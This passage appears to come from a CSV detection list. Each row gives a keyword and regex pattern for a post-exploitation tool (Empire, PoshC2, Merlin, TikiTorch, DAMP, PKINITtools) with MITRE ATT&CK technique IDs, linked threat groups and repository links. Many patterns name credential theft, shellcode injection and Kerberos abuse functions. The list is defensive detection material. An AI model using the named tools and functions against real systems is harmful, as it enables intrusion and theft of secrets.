Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
"*Get-RemoteMachineAccountHash*",".{0,1000}Get\-RemoteMachineAccountHash.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*Get-RemoteMachineAccountHash.json*",".{0,1000}Get\-RemoteMachineAccountHash\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*getremoteprocesslisting*",".{0,1000}getremoteprocesslisting.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-RickAstley*",".{0,1000}Get\-RickAstley.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-RickAstley.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-RickAstley.ps1*",".{0,1000}Get\-RickAstley\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*gets4uticket.py*",".{0,1000}gets4uticket\.py.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*Get-SccmCacheFolder*",".{0,1000}Get\-SccmCacheFolder.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" 
"*Get-ScheduledTaskComHandler.json*",".{0,1000}Get\-ScheduledTaskComHandler\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*get-screenshot*",".{0,1000}get\-screenshot.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get-screenshotallwindows*",".{0,1000}get\-screenshotallwindows.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" 
"*Get-SecurityPackages.ps1*",".{0,1000}Get\-SecurityPackages\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Vnc.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ShadowCopies*",".{0,1000}Get\-ShadowCopies.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-SharePointSiteURLs*",".{0,1000}Get\-SharePointSiteURLs.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Gets a list of SharePoint site URLs visible to the current user","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*GetShellcode(*",".{0,1000}GetShellcode\(.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*Get-SitelistFields*",".{0,1000}Get\-SitelistFields.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SiteListPassword*",".{0,1000}Get\-SiteListPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SiteListPassword*",".{0,1000}Get\-SiteListPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SiteListPassword*",".{0,1000}Get\-SiteListPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1121","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*getsploit*",".{0,1000}getsploit.{0,1000}","offensive_tool_keyword","getsploit","Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB. Metasploit. Packetstorm and others. The most powerful feature is immediate exploit source download right in your working path.","T1583 - T1584 - T1586","TA0007","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/getsploit","1","0","N/A","N/A","10","1696","242","2023-03-27T15:18:55Z","2017-06-04T09:31:44Z" "*Get-SPN.ps1*",".{0,1000}Get\-SPN\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1114","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-spns All*",".{0,1000}get\-spns\sAll.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. 
and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*get-spns ASREP*",".{0,1000}get\-spns\sASREP.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*get-spns spns*",".{0,1000}get\-spns\sspns.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*Get-SQLInstanceDomain*",".{0,1000}Get\-SQLInstanceDomain.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SQLInstanceDomain.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SQLInstanceDomain.ps1*",".{0,1000}Get\-SQLInstanceDomain\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1082","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SqlServerLinkCrawl*",".{0,1000}Get\-SqlServerLinkCrawl.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Automatically find all linked databases","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-SQLServerLoginDefaultPw*",".{0,1000}Get\-SQLServerLoginDefaultPw.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLServerLoginDefaultPw.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SQLServerLoginDefaultPw*",".{0,1000}Get\-SQLServerLoginDefaultPw.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
